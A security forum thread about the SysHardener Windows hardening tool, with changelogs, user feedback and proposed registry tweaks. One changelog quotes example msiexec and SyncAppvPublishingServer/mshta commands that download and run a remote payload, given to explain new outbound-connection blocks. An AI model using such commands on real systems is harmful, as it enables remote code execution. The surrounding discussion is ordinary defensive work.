SysHardener: Harden Windows Settings

Discussion in 'other anti-malware software' started by novirusthanks, Feb 26, 2018.

  1. Krusty

    Krusty Registered Member

    Joined:
    Feb 3, 2012
    Posts:
    6,789
    Location:
    Among the gum trees
    @Umbra ,

    Very cool! I hadn't seen that option. Thanks. :thumb:
     
  2. mattdocs12345

    mattdocs12345 Registered Member

    Joined:
    Mar 23, 2013
    Posts:
    1,879
    Location:
    US
  3. Hiltihome

    Hiltihome Registered Member

    Joined:
    Jul 5, 2013
    Posts:
    806
    Location:
    Baden Germany
    Suggestion:
    There should be a dot, or a circle, around those checkboxes, that are selected by default, even if they are unchecked.
    This would help troubleshoting.
     
  4. Umbra

    Umbra Registered Member

    Joined:
    Feb 10, 2011
    Posts:
    5,766
    Location:
    Europe then Asia
    @novirusthanks I think the most important option that should be implemented is that SH should create a backup of the user current "setup" before it applies the changes.
     
  5. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    8,329
    Location:
    U.S.A. (South)
    That's likely very easily done. It seems a very busy camp in NVT Labs these days.
     
  6. Umbra

    Umbra Registered Member

    Joined:
    Feb 10, 2011
    Posts:
    5,766
    Location:
    Europe then Asia
    yes, and i'm waiting for a GUI version of SOB, maybe in few years :D:argh:
     
  7. mattdocs12345

    mattdocs12345 Registered Member

    Joined:
    Mar 23, 2013
    Posts:
    1,879
    Location:
    US
    Check for updates option from within the software would be also nice. I don't want to go every time here or on their website to check if new version is available.
     
  8. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,027
    Location:
    Italy
    Released SysHardener v1.3:
    http://www.novirusthanks.org/products/syshardener/

    Changelog:

    + New option "Disable Loading of DLLs via AppInit_DLLs"
    + New option "Load Only Digitally Signed DLLs via AppInit_DLLs"
    + New option "Disable Windows Subsystem for Linux"
    + Improved "Disable PowerShell v2.0 Engine"
    + Added more "blue" icons that can be clicked to get more info
    + Some "orange" icons can be clicked to get more info
    + Reduced height of the main application window
    + Main application window is sizeable and can be maximized
    + Added "Tweaks" option on top main menu to "select all\suggested tweaks\unselect all" tweaks
    + Minor fixes and optimizations
    + Updated help file

    Here is a screenshot:

    syshardener.png

    New text on the help (faqs) file:

    @Umbra

    Added on the todo list.

    @mattdocs12345

    I see there is a confusion about how to restore settings, I'll try to reply to a few questions:

    Q - How to restore settings?

    A - Select only the tweaks you want to reset\restore to their defaults and then click "Restore Selected"

    Q - When I uninstall SysHardener, are all twekas restored to their defaults?

    A - No, SysHardener just removes its files from your system once it is uninstalled.

    Q - If I want to restore all pre-selected (suggested) tweaks to their defaults, what can I do?

    A - On the top main menu "Tweaks" select "Suggested Tweaks" to select\check all suggested (pre-selected) tweaks. Then click the button "Restore Selected" to restore the selected tweaks to their factory-settings values.

    Basically, the button "Restore Selected" allows you to only reset\restore the selected (checked) tweaks, not all of them.

    Thanks for letting me know.

    Added on the todo list.
     
  9. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    8,329
    Location:
    U.S.A. (South)
    And a very Happy EASTER to you Andreas-family, and to all our community connected members and their family at Wilders . Many more and thanks as always. :)
     
    Last edited: Apr 1, 2018
  10. Buddel

    Buddel Registered Member

    Joined:
    Apr 28, 2015
    Posts:
    968
    Thanks for the new version, Andreas. All suggested tweaks applied, no problems here. Happy Easter!:thumb:
     
  11. chrcol

    chrcol Registered Member

    Joined:
    Apr 19, 2006
    Posts:
    897
    Location:
    UK
    excellent product
     
  12. co22

    co22 Registered Member

    Joined:
    Nov 22, 2011
    Posts:
    361
    Location:
    router
    @novirusthanks
    please consider add this tweaks setting grabbed from Win7 Manager
    Disable/Enable Security Tab
    Disable/Enable Folder Options
    Disable Windows features
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Programs]
    "NoWindowsFeatures"=dword:00000001
    Enable Windows features
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Programs]
    "NoWindowsFeatures"=-
    Prevent from installing devices
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeviceInstall\Restrictions]
    "DenyUnspecified"=dword:00000001
    Allow installing devices
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeviceInstall\Restrictions]
    "DenyUnspecified"=-
    Prevent from installing Msi program
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
    "DisableMSI"=dword:00000002
    Allow installing Msi program
    Code:
    Windows Registry Editor Version 5.00
    
    [-HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
    
    Disable RegistryTools (regedit.exe regedt32.exe)
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    "DisableRegistryTools"=dword:00000001
    Enable RegistryTools (regedit.exe regedt32.exe)
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    "DisableRegistryTools"=-
    Restrict access over anonymous connections
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Lsa]
    "RestrictAnonymous"=dword:00000001
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
    "RestrictAnonymous"=dword:00000001
    unrestricted access over anonymous connections
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Lsa]
    "RestrictAnonymous"=-
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
    "RestrictAnonymous"=-
    Disable Programs and Features windows uninstaller
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Programs]
    "NoProgramsAndFeatures"=dword:00000001
    enable Programs and Features windows uninstaller
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Programs]
    "NoProgramsAndFeatures"=-
    Disable Task Manager
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    "DisableTaskMgr"=dword:00000001
    Enable Task Manager
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    "DisableTaskMgr"=-
    some more
    Disable Command Prompt and Bat files
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
    "DisableCMD"=dword:00000002
    Enable Command Prompt and Bat files
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
    "DisableCMD"=-
    
    Force .DLL unload from memory
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
    "AlwaysUnloadDll"=dword:00000001
    unforce .DLL unload from memory
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
    "AlwaysUnloadDll"=-
    
     
    Last edited: Apr 2, 2018
  13. Hiltihome

    Hiltihome Registered Member

    Joined:
    Jul 5, 2013
    Posts:
    806
    Location:
    Baden Germany
    @co22:
    What you suggest are user restrictions, not security tweaks.

    AV software will flag these as malicious modifications.

    I would not recommend to add these to SysHardener.
     
  14. co22

    co22 Registered Member

    Joined:
    Nov 22, 2011
    Posts:
    361
    Location:
    router
    :thumb: i know i can apply all with one click but like to see it in SysHardener
    it can be added as user restriction tab.may useful to someone
    anyway thanks for your comment.
     
  15. amico81

    amico81 Registered Member

    Joined:
    Oct 18, 2017
    Posts:
    71
    Location:
    Germany
    when is it planned to release other languages?
     
  16. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,027
    Location:
    Italy
    @amico81

    We may add multilingual support on next versions, no ETA for now.

    @co22

    Thanks for the suggestions, very welcome.

    Personally I agree with @Hiltihome, that changes are more user restrictions and not security tweaks.

    We may not add them to SysHardener, maybe on a new\future program that is focused on user restrictions\privacy tweaks only.
     
  17. chrcol

    chrcol Registered Member

    Joined:
    Apr 19, 2006
    Posts:
    897
    Location:
    UK
    No to mention at least some of those are obsolete tweaks found on junk tweaker sites.
     
  18. imuade

    imuade Registered Member

    Joined:
    Aug 4, 2016
    Posts:
    685
    Location:
    Italy
    I've just tried this nice piece of SW and I really like it, but I'd have a suggestion, if you don't mind.
    By default, only the currently active options should be enabled.
    For example, I have the geolocation service disabled, but when I open SysHardener the option "Turn off geolocation service" is unticked.
    What do you think?
     
  19. shadek

    shadek Registered Member

    Joined:
    Feb 26, 2008
    Posts:
    2,538
    Location:
    Sweden
    I agree. This has bugged me too from time to time.
     
  20. JoWazzoo

    JoWazzoo Registered Member

    Joined:
    Nov 11, 2008
    Posts:
    241
    Location:
    Ether
    SH 1.3

    I added

    Tweaks
    Suggested
    Apply

    Green Bar started moving across and then
    create Restore Point popped up.

    I accepted Yes, but wondered ... with the green bar moving had some tweaks been turned on before the creation of the Restore Point?
    This is a bit disconcerting.
     
  21. Umbra

    Umbra Registered Member

    Joined:
    Feb 10, 2011
    Posts:
    5,766
    Location:
    Europe then Asia
    Just in case of issues.

    it shouldn't, from what i remember the changes came after.
     
  22. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,027
    Location:
    Italy
    Released SysHardener v1.4:
    http://www.novirusthanks.org/products/syshardener/

    Here is the changelog:

    + New option "Block Oubound Connections for SyncAppvPublishing.exe" (checked)
    + New option "Block Oubound Connections for Certutil.exe" (checked)
    + New option "Block Oubound Connections for Msiexec.exe" (unchecked)
    + New option "Block Oubound Connections for Odbcconf.exe" (checked)
    + New option "Block Oubound Connections for AtBroker.exe" (checked)
    + "Block Outbound Connections for Csrss.exe" is checked
    + Added button "Windows Updates" on "System Tools" tab
    + Move progress bar after asking-for\creating restore point
    + Updated help file

    Just a quick update to mitigate:

    CertUtil.exe Could Allow Attackers To Download Malware While Bypassing AV
    https://www.bleepingcomputer.com/ne...ckers-to-download-malware-while-bypassing-av/
    * Tweak: "Block Oubound Connections for Certutil.exe"

    Msiexec.exe could allow attackers to download and execute a remote payload
    Example: cmd.exe /c msiexec /q /I "hxxp://127.0.0.1/payload.msi"
    * Tweak: "Block Oubound Connections for Msiexec.exe"

    SyncAppvPublishing.exe could allow attackers to download and execute a remote payload
    Example: SyncAppvPublishingServer.exe ".; *DownloadFile() or DownloadString() or Start-Process mshta.exe hxxp://127.0.0.1/payload.hta"
    * Tweak: "Block Oubound Connections for SyncAppvPublishingServer.exe"

    @JoWazzoo

    Even if the green bar was moving it was just creating the restore point, tweaks are applied only after the question\creation of restore point.

    Now the progressbar moves after the question\creation of restore point to avoid confusions.

    @imuade

    I saved your suggestion.
     
    Last edited: Apr 5, 2018
  23. Buddel

    Buddel Registered Member

    Joined:
    Apr 28, 2015
    Posts:
    968
    Not really a problem here. However, now that SysHardener is installed on my machine (only suggested tweaks applied) boot time has considerably increased (a couple of minutes instead of only approximately one and a half minutes). Is there a tweak that can be disabled, so that boot time goes back to normal? Thanks for your help in advance.

    PS: Maybe it's got something to do with the fact that both OSArmor AND SysHardener are installed here. Should I use one OR the other, or is it OK to use both programs on the same computer? Wouldn't it be just enough to use OSArmor?
     
    Last edited: Apr 6, 2018
  24. Charyb

    Charyb Registered Member

    Joined:
    Jan 16, 2013
    Posts:
    664
    What I don't care for is if I view the suggested tweaks or check all or uncheck all, it changes the Settings.ini file without hitting the apply settings button. This causes all my settings to be lost. What I have done is set my options then rename the copy of the Settings.ini file so I am able to keep my settings. I don't know why the configuration file has to change since I do not hit the apply settings button.

    Please include the option to retain custom settings.

    Until then, I will continue to rename the Settings.ini file.
     

    Attached Files:

    Last edited: Apr 6, 2018
  25. shadek

    shadek Registered Member

    Joined:
    Feb 26, 2008
    Posts:
    2,538
    Location:
    Sweden
    Same here mate! I backup my settings because SysHardener won't remember the settings once I check a new box when I re-open it the next time.

    2018-04-06.png
     
Loading...
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.